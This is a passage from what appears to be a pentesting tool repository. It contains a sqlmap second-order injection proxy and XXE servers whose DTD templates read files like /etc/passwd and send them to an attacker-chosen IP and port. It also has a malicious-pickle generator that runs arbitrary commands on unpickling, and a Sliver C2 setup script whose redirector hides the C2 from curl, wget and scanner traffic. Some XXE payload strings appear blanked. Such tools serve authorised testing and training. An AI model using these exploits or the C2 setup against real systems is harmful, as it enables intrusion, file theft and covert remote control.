23 | # --second-order=http://127.0.0.1:8000/
24 | 
25 | # When sqlmap queries this server for the second order result, this server will fetch the appropriate result
26 | # from the remote server and then supply it back to sqlmap, also allowing you to modify the response if desired
27 | 
28 | class ResultsProvider(object):
29 | '''Base class used to fetch data from server for second order injection using sqlmap'''
30 | 
31 | import requests
32 | import socket
33 | import time
34 | 
35 | def __init__(self, **kwargs):
36 | '''Constructor with sensible requests defaults'''
37 | self.session = self.requests.Session()
38 | self.wait = kwargs.get('wait', 2.0)
39 | self.session.verify = kwargs.get('verify', False)
40 | self.session.timeout = kwargs.get('timeout', 5)
41 | self.session.stream = kwargs.get('stream', False)
42 | self.session.proxies = kwargs.get('proxies', {})
43 | self.session.headers = kwargs.get('headers', {})
44 | self.session.allow_redirects = kwargs.get('allow_redirects', True)
45 | self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {}))
46 | self.url = kwargs.get('url', None)
47 | 
48 | 
49 | 
50 | def doRequest(self, url, params=None, **kwargs):
51 | '''Makes web request with timeout support using requests session'''
52 | while 1:
53 | try:
54 | response = self.session.get(url, params=params, **kwargs)
55 | break
56 | except (self.socket.error, self.requests.exceptions.RequestException):
57 | logging.exception('Retrying request in %.2f seconds...', self.wait)
58 | self.time.sleep(self.wait)
59 | continue
60 | return response
61 | 
62 | 
63 | 
64 | def nextResult(self):
65 | '''Redefine me to make the request and return the response.text'''
66 | #return self.doRequest(url='http://site/whatever/' + str(calculated_value)).text
67 | raise NotImplementedError
68 | 
69 | 
70 | 
71 | 
72 | 
73 | class ResultsProviderImpl(ResultsProvider):
74 | '''Example implementation to exploit 2nd order injection in Pentesterlabs Web II SQL Injection'''
75 | 
76 | def __init__(self, **kwargs):
77 | super(ResultsProviderImpl, self).__init__(**kwargs)
78 | self.counter=kwargs.get('counter', 1)
79 | 
80 | def nextResult(self):
81 | r = self.doRequest(url=self.url + str(self.counter))
82 | self.counter+=1
83 | return r.text
84 | 
85 | 
86 | 
87 | 
88 | 
89 | class ThreadedTCPServer(SocketServer.ThreadingTCPServer):
90 | '''Simple Threaded TCP server'''
91 | pass
92 | 
93 | 
94 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
95 | '''Simple http server request handler'''
96 | 
97 | def do_GET(self):
98 | if self.server.debug:
99 | print '=' * 40 + '\n'
100 | print self.headers
101 | print '=' * 40 + '\n'
102 | 
103 | self.send_response(200)
104 | self.wfile.write('\r\n')
105 | 
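# each GET from sqlmap triggers one fetch of the next second-order page from the real
# target; 'result' below is handed back to sqlmap verbatim, so this is the place to
# tamper with the response first if that is needed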
result = self.server.resultsProvider.nextResult()
106 | self.wfile.write(result)
107 | if self.server.debug:
108 | print '=' * 40 + '\n'
109 | print result
110 | print '=' * 40 + '\n'
111 | 
112 | self.wfile.write('\r\n')
113 | self.wfile.flush()
114 | self.wfile.close()
115 | 
116 | 
117 | 
118 | 
119 | 
120 | if __name__ == '__main__':
121 | parser = OptionParser(usage='%prog [options] <port>')
122 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages')
123 | opts, args = parser.parse_args()
124 | 
125 | 
126 | if len(args) == 1:
127 | try:
128 | port = int(args[0])
129 | except ValueError:
130 | parser.print_help()
131 | parser.exit()
132 | else:
133 | port = 8000
134 | 
135 | 
136 | # parameters for example
137 | # base url where second order injection occurs
138 | baseUrl = 'http://192.168.33.101/sqlinjection/example8/users/'
139 | # starting point to count upwards from in injected results
140 | baseNo = 738
141 | 
142 | 
143 | httpd = ThreadedTCPServer(("", port), ServerHandler)
144 | httpd.debug = opts.debug or False
145 | 
146 | # add the custom resultsprovider implementation
147 | httpd.resultsProvider = ResultsProviderImpl(url=baseUrl, counter=baseNo)
148 | 
149 | 
150 | 
151 | print "Serving at: http://%s:%s/" % ('127.0.0.1', str(port))
152 | httpd.serve_forever()
153 | 
-------------------------------------------------------------------------------- /helper_servers/xxe_http.py: --------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import SimpleHTTPServer
3 | import SocketServer
4 | import sys
5 | import urllib
6 | from optparse import OptionParser
7 | 
8 | 
9 | # payload will look something like this
10 | # where [ip] and [port] are ones accessible to the remote server where this runs
11 | # /etc/passwd is the remote file to retrieve
12 | '''
13 | <?xml version="1.0"?>
14 | <!DOCTYPE foo [ <!ENTITY % xa SYSTEM "http://[ip]:[port]/etc/passwd"> %xa; %xb; ]>
15 | <foo>&external;</foo>
16 | '''
17 | 
18 | response_template = '''<!ENTITY % xc SYSTEM "file://[FN]"><!ENTITY % xb "<!ENTITY external SYSTEM '[PROT]://[IP]:[PORT]/?a=%xc;'>">'''
19 | 
20 | 
21 | class ThreadedTCPServer(SocketServer.ThreadingTCPServer):
22 | pass
23 | 
24 | 
25 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
26 | 
27 | 
28 | def do_GET(self):
29 | if self.server.debug:
30 | print self.headers
31 | 
32 | self.send_response(200)
33 | self.wfile.write('\r\n')
34 | # we parse the request that contains the file contents
35 | if self.server.parseNext:
36 | self.server.parseNext = False
37 | self.wfile.write('Content to return') # this will take the place of the &external; entity
38 | print '\n' + urllib.unquote(self.path.split('a=',1)[-1])
39 | # we send back the DTD and flick the switch to send back something different on next request
40 | else:
41 | self.wfile.write(response_template.replace('[FN]', self.path).replace('[PROT]','http').replace('[IP]',
42 | self.server.ip).replace('[PORT]', self.server.port) + '\r\n')
43 | self.server.parseNext = True
44 | 
45 | 
46 | self.wfile.write('\r\n')
47 | self.wfile.flush()
48 | self.wfile.close()
49 | return
50 | 
51 | 
52 | 
53 | if __name__ == '__main__':
54 | parser = OptionParser(usage='%prog [options] <ip> <port>')
55 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages')
56 | opts, args = parser.parse_args()
57 | 
58 | if len(args) != 2:
59 | parser.print_help()
60 | parser.exit()
61 | try:
62 | ip = args[0] # this is the address that is advertised in the generated DTD
63 | port = int(args[1])
64 | except ValueError:
65 | parser.print_help()
66 | parser.exit()
67 | 
68 | SocketServer.ThreadingTCPServer.allow_reuse_address = True
69 | # bind to 
everything 70 | httpd = ThreadedTCPServer(("", port), ServerHandler) 71 | httpd.port = str(port) 72 | httpd.ip = ip 73 | httpd.parseNext = False 74 | httpd.debug = opts.debug or False 75 | 76 | print "Serving at: http://%s:%s/" % ('0.0.0.0', str(port)) 77 | httpd.serve_forever() 78 | -------------------------------------------------------------------------------- /helper_servers/xxe_http_ftpfwd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import SimpleHTTPServer 3 | import SocketServer 4 | import sys 5 | import urllib 6 | from optparse import OptionParser 7 | 8 | 9 | # payload will look something like this 10 | # where [ip] and [port] are ones accessible to the remote server where this runs 11 | # /etc/passwd is the remote file to retrieve 12 | ''' 13 | 14 | %xa; %xb; ]> 15 | &external; 16 | ''' 17 | 18 | ''' 19 | 20 | "> %dtd; %xb; ]> 21 | &external; 22 | ''' 23 | 24 | 25 | #response_template = '''">''' 26 | 27 | #response_template = '''">''' 28 | #response_template = '''">''' 29 | #response_template = '''">''' 30 | 31 | 32 | #response_template = '''">''' 33 | 34 | 35 | response_template = '''">">''' 36 | 37 | 38 | 39 | class ThreadedTCPServer(SocketServer.ThreadingTCPServer): 40 | pass 41 | 42 | 43 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 44 | 45 | 46 | def do_GET(self): 47 | if self.server.debug: 48 | print self.headers 49 | 50 | if self.path == '/join.dtd': 51 | self.send_response(200) 52 | self.wfile.write('\r\n') 53 | self.wfile.write('') 54 | self.wfile.write('\r\n') 55 | self.wfile.flush() 56 | self.wfile.close() 57 | return 58 | 59 | self.send_response(200) 60 | self.wfile.write('\r\n') 61 | # we parse the request that contains the file contents 62 | #if self.server.parseNext: 63 | #self.server.parseNext = False 64 | #self.wfile.write('Content to return') # this will take the place of the &external; entity 65 | #print '\n' + urllib.unquote(self.path.split('a=',1)[-1]) 66 | # we send back the DTD and flick the switch to send back something different on next request 67 | #else: 68 | self.wfile.write(response_template.replace('[FN]', self.path).replace('[IP]', 69 | self.server.ip).replace('[PORT]', self.server.ftpport) + '\r\n') 70 | self.server.parseNext = True 71 | 72 | 73 | self.wfile.write('\r\n') 74 | self.wfile.flush() 75 | self.wfile.close() 76 | return 77 | 78 | 79 | 80 | if __name__ == '__main__': 81 | parser = OptionParser(usage='%prog [options] ') 82 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages') 83 | opts, args = parser.parse_args() 84 | 85 | if len(args) != 3: 86 | parser.print_help() 87 | parser.exit() 88 | try: 89 | ip = args[0] # this is the address that is advertised in the generated DTD 90 | port = int(args[1]) 91 | ftpport = int(args[2]) 92 | except ValueError: 93 | parser.print_help() 94 | parser.exit() 95 | 96 | SocketServer.ThreadingTCPServer.allow_reuse_address = True 97 | # bind to everything 98 | httpd = ThreadedTCPServer(("", port), ServerHandler) 99 | httpd.port = str(port) 100 | httpd.ftpport = str(ftpport) 101 | httpd.ip = ip 102 | httpd.parseNext = False 103 | httpd.debug = opts.debug or False 104 | 105 | print "Serving at: http://%s:%s/" % ('0.0.0.0', str(port)) 106 | httpd.serve_forever() -------------------------------------------------------------------------------- /payload_creators/badpickle.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env 
python 2 | 3 | # Python library/command line tool for creating malicious pickles to attack 4 | # systems that unpickle arbitrary user provided content 5 | 6 | 7 | class BadPickle(): 8 | ''' 9 | Creates malicious pickle strings 10 | 11 | 12 | Usage: 13 | 14 | Different exploit methods are available depending on ptype setting. 15 | 16 | Examples: 17 | 18 | The following runs a command and puts the return code in the pickle output. 19 | 20 | Uses os.system(). Should work fairly universally. 21 | 22 | ----- 23 | > bp = BadPickle('touch /tmp/pwned', ptype='system') 24 | > bpString = bp.sploit() 25 | ----- 26 | 27 | OR 28 | 29 | The following runs a command with the command stdout in the pickle output. 30 | 31 | Uses subprocess.check_output(). Only works on python 2.7+. 32 | Generates CalledProcessError on non zero return code. 33 | 34 | ----- 35 | > bp = BadPickle(['cat', '/etc/passwd'], ptype='check_output') 36 | > bpString = bp.sploit() 37 | ----- 38 | 39 | OR 40 | 41 | The following runs a command with the command stdout in the pickle output. 42 | 43 | Uses subprocess.call(). 44 | 45 | ----- 46 | > bp = BadPickle(['cat', '/etc/passwd'], ptype='subprocess') 47 | > bpString = bp.sploit() 48 | ----- 49 | ''' 50 | 51 | import pickle 52 | 53 | def __init__(self, cmd, ptype='check_output'): 54 | '''Initialise the object. 55 | 56 | ptype is the type of bad pickle to create. 57 | * check_output (default) uses subprocess.check_output. Output is command 58 | stdout. Only works on python 2.7+ 59 | * system uses os.system. Output is command return code. 60 | * subprocess uses subprocess.call. Output is command 61 | return code 62 | 63 | cmd is the command data. It should be: 64 | * A string for ptype 'system'. 65 | * A list of strings for ptype check_output or subprocess 66 | 67 | ''' 68 | self.ptype = ptype 69 | self.c = cmd 70 | if ptype == 'check_output': 71 | if type(self.c) != list: 72 | raise TypeError('Input value must be list') 73 | elif ptype == 'system': 74 | if type(self.c) != str: 75 | raise TypeError('Input value must be string') 76 | elif ptype == 'subprocess': 77 | if type(self.c) != list: 78 | raise TypeError('Input value must be list') 79 | 80 | 81 | def sploit(self): 82 | '''Return the malicious pickled string''' 83 | if self.ptype == 'check_output': 84 | return self.pickle.dumps(self.CheckOutputObject(self.c)) 85 | elif self.ptype == 'subprocess': 86 | return self.pickle.dumps(self.SubprocessCall(self.c)) 87 | elif self.ptype == 'system': 88 | return self.pickle.dumps(self.SystemObject(self.c)) 89 | 90 | 91 | 92 | # outputs stdout of process as pickle output 93 | # this will generate CalledProcessError for processes with non 0 exit status 94 | # only works on python 2.7+ 95 | # instantiate with list of process name and params 96 | class CheckOutputObject(object): 97 | '''Bad pickle object using subprocess.check_output''' 98 | subprocess = __import__('subprocess') 99 | 100 | def __init__(self, c): 101 | self.c = c 102 | 103 | def __reduce__(self): 104 | return (self.subprocess.check_output,(self.c,)) 105 | 106 | 107 | class SubprocessCall(object): 108 | '''Bad pickle object using subprocess.call''' 109 | subprocess = __import__('subprocess') 110 | 111 | def __init__(self, c): 112 | self.c = c 113 | 114 | def __reduce__(self): 115 | return (self.subprocess.call, (self.c,)) 116 | 117 | 118 | # should work fairly universally, but only process exit code provided as output 119 | # instantiate with single string "shell" command 120 | class SystemObject(object): 121 | '''Bad pickle object 
using os.system''' 122 | os = __import__('os') 123 | 124 | def __init__(self, c): 125 | self.c = c 126 | 127 | def __reduce__(self): 128 | return (self.os.system, (self.c,)) 129 | 130 | 131 | 132 | 133 | 134 | if __name__ == '__main__': 135 | 136 | from optparse import OptionParser 137 | parser = OptionParser(usage='%prog [options] ') 138 | parser.add_option('-r', '--raw', dest='raw', action='store_true', help='no encoding, raw output') 139 | parser.add_option('-x', '--hex', dest='hex', action='store_true', help='encode output using ASCII hex') 140 | parser.add_option('-b', '--base64', dest='base64', action='store_true', help='encode output using Base64 (default)') 141 | parser.add_option('-s', '--system', dest='system', action='store_true', help='use os.system. Command will be a single string.') 142 | parser.add_option('-c', '--checkoutput', dest='checkoutput', action='store_true', help='use subprocess.check_output (default). Command will be a list of command name and params.') 143 | parser.add_option('-p', '--subprocess', dest='subprocess', action='store_true', help='use subprocess.call. Command will be a list of command name and params.') 144 | opts, args = parser.parse_args() 145 | 146 | if len(args) == 0: 147 | parser.print_help() 148 | parser.exit() 149 | else: 150 | if opts.system and (opts.checkoutput or opts.subprocess): 151 | print 'Cannot use multiple exploit methods. Pick one' 152 | parser.exit() 153 | elif opts.system: 154 | d = args[0] 155 | pt = 'system' 156 | elif opts.subprocess: 157 | pt = 'subprocess' 158 | d = args 159 | else: 160 | pt = 'check_output' 161 | d = args 162 | 163 | 164 | if (opts.raw and (opts.base64 or opts.hex)) or (opts.hex and (opts.base64 or opts.raw)): 165 | print 'Multiple encoder options set. Pick one' 166 | parser.exit() 167 | elif opts.raw: 168 | encoder=str 169 | elif opts.hex: 170 | from binascii import hexlify 171 | encoder=hexlify 172 | else: 173 | from base64 import b64encode 174 | encoder=b64encode 175 | 176 | 177 | bp = BadPickle(d, ptype=pt) 178 | print encoder(bp.sploit()) 179 | -------------------------------------------------------------------------------- /presentations/AD_enumeration_with_LDAP_bsides-bonus_detection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stephenbradshaw/pentesting_stuff/82c88be31d22b5b7bbda866aaed2bffb6cdc0ba0/presentations/AD_enumeration_with_LDAP_bsides-bonus_detection.pdf -------------------------------------------------------------------------------- /presentations/ActiveDirectoryLDAPEnumeration_public.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stephenbradshaw/pentesting_stuff/82c88be31d22b5b7bbda866aaed2bffb6cdc0ba0/presentations/ActiveDirectoryLDAPEnumeration_public.pdf -------------------------------------------------------------------------------- /setup_scripts/c2_setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | SLIVER_VERSION=v1.5.43 3 | 4 | apt update 5 | apt upgrade -y 6 | apt install net-tools -y 7 | apt install apache2 -y 8 | apt install php -y 9 | apt install libapache2-mod-php -y 10 | apt install python-is-python3 -y 11 | mkdir -p /opt/sliver 12 | wget https://github.com/BishopFox/sliver/releases/download/$SLIVER_VERSION/sliver-server_linux -O /opt/sliver/sliver-server_linux_$SLIVER_VERSION 13 | wget 
https://github.com/BishopFox/sliver/releases/download/$SLIVER_VERSION/sliver-client_linux -O /opt/sliver/sliver-client_linux_$SLIVER_VERSION
14 | chmod +x /opt/sliver/sliver-*
15 | rm -f /opt/sliver/sliver-client
16 | rm -f /opt/sliver/sliver-server
17 | ln -s /opt/sliver/sliver-client_linux_$SLIVER_VERSION /opt/sliver/sliver-client
18 | ln -s /opt/sliver/sliver-server_linux_$SLIVER_VERSION /opt/sliver/sliver-server
19 | 
20 | echo '127.0.0.1 backend' >> /etc/hosts
21 | 
22 | 
23 | cat > /etc/apache2/sites-available/forward-http.conf <<'endmsg'
24 | <VirtualHost *:80>
25 | RewriteEngine On
26 | 
27 | <Directory /var/www/html>
28 | Options FollowSymLinks MultiViews
29 | AllowOverride All
30 | Require all granted
31 | FileETag None
32 | </Directory>
33 | 
34 | ProxyPreserveHost On
35 | 
36 | ServerName localhost
37 | DocumentRoot /var/www/html
38 | 
39 | ErrorLog ${APACHE_LOG_DIR}/error.log
40 | CustomLog ${APACHE_LOG_DIR}/access.log combined
41 | 
42 | 
43 | ServerSignature Off
44 | 
45 | </VirtualHost>
46 | endmsg
47 | 
48 | a2enmod proxy_http proxy rewrite
49 | a2dissite 000-default
50 | a2ensite forward-http
51 | 
52 | systemctl restart apache2
53 | 
54 | # create a multiplayer user file for local connection
55 | SLIVER_ROOT_DIR=/opt/sliver/ /opt/sliver/sliver-server operator --name admin --lhost 127.0.0.1 --save /opt/sliver/admin_127.0.0.1.cfg
56 | 
57 | 
58 | cat > /etc/systemd/system/sliver.service <<'endmsg'
59 | [Unit]
60 | Description=Sliver
61 | After=network.target
62 | StartLimitIntervalSec=0
63 | 
64 | [Service]
65 | Environment="SLIVER_ROOT_DIR=/opt/sliver"
66 | Type=simple
67 | Restart=on-failure
68 | RestartSec=3
69 | User=root
70 | ExecStart=/opt/sliver/sliver-server daemon
71 | 
72 | [Install]
73 | WantedBy=multi-user.target
74 | endmsg
75 | 
76 | 
77 | systemctl daemon-reload
78 | 
79 | systemctl start sliver
80 | systemctl status sliver
81 | 
82 | 
83 | cat > /var/www/html/index.html <<'endmsg'
84 | 
85 | 
86 | endmsg
87 | 
88 | 
89 | 
90 | 
91 | cat > /var/www/html/robots.txt <<'endmsg'
92 | User-agent: *
93 | Disallow: /
94 | endmsg
95 | 
96 | 
97 | 
98 | cat > /var/www/html/.htaccess <<'endmsg'
99 | RewriteEngine on
100 | 
101 | # rewrite / to index.html
102 | RewriteRule ^$ /index.html [L]
103 | 
104 | # serve files that exist
105 | RewriteCond /%{REQUEST_FILENAME} -f
106 | RewriteRule .? 
- [L] 107 | 108 | # Respond to known command line/scanner user agents with 404 109 | RewriteCond %{HTTP_USER_AGENT} curl|wget|masscan|python|zgrab|mobile|censys|hello|okhttp|scans|spider|bot [NC] 110 | RewriteRule .* - [R=404] 111 | 112 | # Send remaining requests to port 8888 on backend host 113 | RewriteRule ^.*$ http://backend:8888%{REQUEST_URI} [P,NE] 114 | endmsg 115 | 116 | 117 | MRANDOM=`tr -dc A-Za-z0-9 /var/www/html/$MRANDOM.php <<'endmsg' 121 | $value) { 126 | echo "$header: $value \n"; 127 | } 128 | 129 | echo "\n\n=APACHE VARIABLES=\n"; 130 | 131 | echo "HTTP HEADERS\n"; 132 | $HTTP_ACCEPT = getenv('HTTP_ACCEPT'); 133 | echo "HTTP_ACCEPT : $HTTP_ACCEPT\n"; 134 | $HTTP_COOKIE = getenv('HTTP_COOKIE'); 135 | echo "HTTP_COOKIE : $HTTP_COOKIE\n"; 136 | $HTTP_FORWARDED = getenv('HTTP_FORWARDED'); 137 | echo "HTTP_FORWARDED : $HTTP_FORWARDED\n"; 138 | $HTTP_HOST = getenv('HTTP_HOST'); 139 | echo "HTTP_HOST : $HTTP_HOST\n"; 140 | $HTTP_PROXY_CONNECTION = getenv('HTTP_PROXY_CONNECTION'); 141 | echo "HTTP_PROXY_CONNECTION : $HTTP_PROXY_CONNECTION\n"; 142 | $HTTP_REFERER = getenv('HTTP_REFERER'); 143 | echo "HTTP_REFERER : $HTTP_REFERER\n"; 144 | $HTTP_USER_AGENT = getenv('HTTP_USER_AGENT'); 145 | echo "HTTP_USER_AGENT : $HTTP_USER_AGENT\n"; 146 | 147 | echo "\n\n=CONNECTION & REQUEST=\n"; 148 | $AUTH_TYPE = getenv('AUTH_TYPE'); 149 | echo "AUTH_TYPE : $AUTH_TYPE\n"; 150 | $CONN_REMOTE_ADDR = getenv('CONN_REMOTE_ADDR'); 151 | echo "CONN_REMOTE_ADDR : $CONN_REMOTE_ADDR\n"; 152 | $CONTEXT_PREFIX = getenv('CONTEXT_PREFIX'); 153 | echo "CONTEXT_PREFIX : $CONTEXT_PREFIX\n"; 154 | $IPV6 = getenv('IPV6'); 155 | echo "IPV6 : $IPV6\n"; 156 | $PATH_INFO = getenv('PATH_INFO'); 157 | echo "PATH_INFO : $PATH_INFO\n"; 158 | $QUERY_STRING = getenv('QUERY_STRING'); 159 | echo "QUERY_STRING : $QUERY_STRING\n"; 160 | $REMOTE_ADDR = getenv('REMOTE_ADDR'); 161 | echo "REMOTE_ADDR : $REMOTE_ADDR\n"; 162 | $REMOTE_HOST = getenv('REMOTE_HOST'); 163 | echo "REMOTE_HOST : $REMOTE_HOST\n"; 164 | $REMOTE_IDENT = getenv('REMOTE_IDENT'); 165 | echo "REMOTE_IDENT : $REMOTE_IDENT\n"; 166 | $REMOTE_PORT = getenv('REMOTE_PORT'); 167 | echo "REMOTE_PORT : $REMOTE_PORT\n"; 168 | $REMOTE_USER = getenv('REMOTE_USER'); 169 | echo "REMOTE_USER : $REMOTE_USER\n"; 170 | $REQUEST_METHOD = getenv('REQUEST_METHOD'); 171 | echo "REQUEST_METHOD : $REQUEST_METHOD\n"; 172 | 173 | 174 | echo "\n\n=SPECIALS=\n"; 175 | $CONN_REMOTE_ADDR = getenv('CONN_REMOTE_ADDR'); 176 | echo "CONN_REMOTE_ADDR : $CONN_REMOTE_ADDR\n"; 177 | $HTTPS = getenv('HTTPS'); 178 | echo "HTTPS : $HTTPS\n"; 179 | $IS_SUBREQ = getenv('IS_SUBREQ'); 180 | echo "IS_SUBREQ : $IS_SUBREQ\n"; 181 | $REMOTE_ADDR = getenv('REMOTE_ADDR'); 182 | echo "REMOTE_ADDR : $REMOTE_ADDR\n"; 183 | $REQUEST_FILENAME = getenv('REQUEST_FILENAME'); 184 | echo "REQUEST_FILENAME : $REQUEST_FILENAME\n"; 185 | $REQUEST_SCHEME = getenv('REQUEST_SCHEME'); 186 | echo "REQUEST_SCHEME : $REQUEST_SCHEME\n"; 187 | $REQUEST_URI = getenv('REQUEST_URI'); 188 | echo "REQUEST_URI : $REQUEST_URI\n"; 189 | $THE_REQUEST = getenv('THE_REQUEST'); 190 | echo "THE_REQUEST : $THE_REQUEST\n"; 191 | 192 | echo "\n\n=DATA=\n"; 193 | try { 194 | echo "Parsed:\n"; 195 | print_r($_POST); 196 | echo "\n"; 197 | } catch (Exception $e) { 198 | 199 | } 200 | try { 201 | echo "Raw (base64 encoded):\n"; 202 | echo base64_encode(file_get_contents('php://input')); 203 | } catch (Exception $e) { 204 | 205 | } 206 | echo "\n\nDone\n\n"; 207 | 208 | ?> 209 | endmsg 210 | 211 | mkdir -p /home/ubuntu/.sliver-client/configs 212 | mv 
/opt/sliver/admin_127.0.0.1.cfg /home/ubuntu/.sliver-client/configs/ 213 | chown -R ubuntu:ubuntu /home/ubuntu/.sliver-client 214 | 215 | echo "Test script at $MRANDOM.php" 216 | -------------------------------------------------------------------------------- /utilities/basic_kerberos_auth.py: -------------------------------------------------------------------------------- 1 | """Basic implementation of an Impacket Kerberos HTTP Request Authentication module for Python Requests""" 2 | # Modified from https://gist.github.com/dirkjanm/299f5389f83e4053c51f33fb8da42f9c 3 | 4 | import os 5 | import sys 6 | import datetime 7 | import base64 8 | from pyasn1.type.univ import noValue 9 | from pyasn1.codec.der import decoder, encoder 10 | from impacket.spnego import SPNEGO_NegTokenInit, TypesMech 11 | from impacket.spnego import ASN1_OID, asn1encode, ASN1_AID 12 | from impacket.spnego import SPNEGO_NegTokenInit, TypesMech, ASN1_OID, asn1encode, ASN1_AID 13 | from impacket.krb5.gssapi import KRB5_AP_REQ 14 | from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set 15 | from impacket.krb5.types import Principal, KerberosTime, Ticket 16 | from impacket.krb5 import constants 17 | from impacket.krb5.ccache import CCache 18 | from struct import pack 19 | from requests.auth import AuthBase 20 | import logging 21 | from logging import Logger 22 | 23 | 24 | def create_logger(loglevel: str, name: str) -> Logger: 25 | logger = logging.getLogger(name) 26 | logger.setLevel(loglevel) 27 | handler = logging.StreamHandler(sys.stderr) 28 | formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') 29 | handler.setFormatter(formatter) 30 | logger.addHandler(handler) 31 | 32 | return logger 33 | 34 | 35 | 36 | # Kerberos Authenticator for Python requests using ST in ccache format as created per: 37 | # getST.py -spn HTTP/site.example.com -dc-ip 1.2.3.4 EXAMPLE/username 38 | 39 | # Does preemptive authentication (e.g. 
will not wait for Negotiate 401 response before sending auth header) 40 | 41 | # Use with requests like so 42 | # from basic_kerberos_auth import HTTPBasicKerberosAuth 43 | # kerberos_auth = HTTPBasicKerberosAuth() 44 | # r = requests.get(url, auth=kerberos_auth) 45 | 46 | 47 | 48 | class HTTPBasicKerberosAuth(AuthBase): 49 | """Basic Requests HTTP Kerberos authentication module""" 50 | 51 | def __init__(self, ccache=None, serverPrincipal=None, loglevel=None): 52 | self.ccache_file = ccache if ccache else os.getenv('KRB5CCNAME') 53 | if ccache: 54 | self.ccache = CCache.loadFile(ccache) 55 | else: 56 | if not os.getenv('KRB5CCNAME'): 57 | raise Exception('No credential file specified and no value in KRB5CCNAME environment variable') 58 | self.ccache = CCache.loadFile(os.getenv('KRB5CCNAME')) 59 | 60 | if not loglevel: 61 | loglevel = logging.root.level 62 | 63 | self.logger = create_logger(loglevel, 'HTTPBasicKerberosAuth') 64 | 65 | self.logger.debug('Ccache file: {}'.format(self.ccache_file)) 66 | self.serverPrincipal = serverPrincipal 67 | 68 | 69 | def __call__(self, request): 70 | request.headers['Authorization'] = 'Negotiate {}'.format(base64.b64encode(self.auth(request)).decode()) 71 | return request 72 | 73 | 74 | # Modified from 75 | # https://gist.github.com/dirkjanm/299f5389f83e4053c51f33fb8da42f9c 76 | def auth(self, request): 77 | 78 | get_cred_host = lambda x: x.getServerPrincipal().decode().split('@')[0].split('/')[1] 79 | match = request.url.split('/')[2] 80 | 81 | creds = self.ccache.credentials 82 | if len(creds) < 1: 83 | raise Exception('No credentials in provided ccache file {}'.format(self.ccache_file)) 84 | 85 | self.logger.debug('Ccache file has {} credentials'.format(len(creds))) 86 | 87 | if self.serverPrincipal: 88 | match = self.serverPrincipal 89 | 90 | matching_creds = [a for a in creds if get_cred_host(a) == match] 91 | 92 | if len(matching_creds) < 1: 93 | raise Exception('No credential found in cache matching target host {}'.format(match)) 94 | 95 | matched_cred = matching_creds[0] 96 | credServicePrincipal = matched_cred.getServerPrincipal().decode() 97 | 98 | 99 | endtime = matched_cred.header.fields['time']['endtime'] 100 | 101 | if endtime < datetime.datetime.now(datetime.timezone.utc).timestamp(): 102 | raise Exception('Credential has expired') 103 | 104 | 105 | TGS = matched_cred.toTGS() 106 | tgs1, cipher, sessionKey = TGS['KDC_REP'], TGS['cipher'], TGS['sessionKey'] 107 | 108 | blob = SPNEGO_NegTokenInit() 109 | 110 | # Kerberos v5 mech 111 | blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']] 112 | 113 | # Let's extract the ticket from the TGS 114 | tgs = decoder.decode(tgs1, asn1Spec = TGS_REP())[0] 115 | 116 | domain = str(tgs.getComponentByName('crealm')) 117 | user = [a for a in str(tgs.getComponentByName('cname')).split('\n') if a][-1].strip() 118 | 119 | self.logger.debug('Credential: Server principal:{}; Domain: {}; User: {}; Expiry: {}'.format(credServicePrincipal, domain, user, str(datetime.datetime.fromtimestamp(endtime)))) 120 | 121 | ticket = Ticket() 122 | ticket.from_asn1(tgs['ticket']) 123 | 124 | # Now let's build the AP_REQ 125 | apReq = AP_REQ() 126 | apReq['pvno'] = 5 127 | apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value) 128 | 129 | opts = list() 130 | apReq['ap-options'] = constants.encodeFlags(opts) 131 | seq_set(apReq,'ticket', ticket.to_asn1) 132 | 133 | authenticator = Authenticator() 134 | authenticator['authenticator-vno'] = 5 135 | authenticator['crealm'] = domain 136 | 137 | userName = 
Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
138 | seq_set(authenticator, 'cname', userName.components_to_asn1)
139 | now = datetime.datetime.utcnow()
140 | 
141 | authenticator['cusec'] = now.microsecond
142 | authenticator['ctime'] = KerberosTime.to_asn1(now)
143 | 
144 | encodedAuthenticator = encoder.encode(authenticator)
145 | 
146 | # Key Usage 11
147 | # AP-REQ Authenticator (includes application authenticator
148 | # subkey), encrypted with the application session key
149 | # (Section 5.5.1)
150 | encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)
151 | 
152 | apReq['authenticator'] = noValue
153 | apReq['authenticator']['etype'] = cipher.enctype
154 | apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
155 | 
156 | blob['MechToken'] = pack('B', ASN1_AID) + asn1encode(pack('B', ASN1_OID) + asn1encode(
157 | TypesMech['KRB5 - Kerberos 5']) + KRB5_AP_REQ + encoder.encode(apReq))
158 | return blob.getData()
159 | 
-------------------------------------------------------------------------------- /utilities/cert_checker.py: --------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import socket
3 | from OpenSSL import SSL, crypto
4 | import requests
5 | import OpenSSL
6 | import asn1crypto
7 | import cert_human
8 | 
9 | methods = [
10 | 'SSLv23_METHOD',
11 | 'SSLv2_METHOD',
12 | 'SSLv3_METHOD',
13 | 'TLSv1_1_METHOD',
14 | 'TLSv1_2_METHOD',
15 | 'TLSv1_METHOD']
16 | 
17 | 
18 | # openssl s_client -servername <hostname> -showcerts -connect <hostname>:443
19 | 
20 | class SSLCertChecker():
21 | 
22 | def __init__(self, hostname, port, methods=methods, use_sni=True, cafile=None, force_verify=True, debug=False):
23 | self.hostname = hostname
24 | self.port = int(port)
25 | self.certs = []
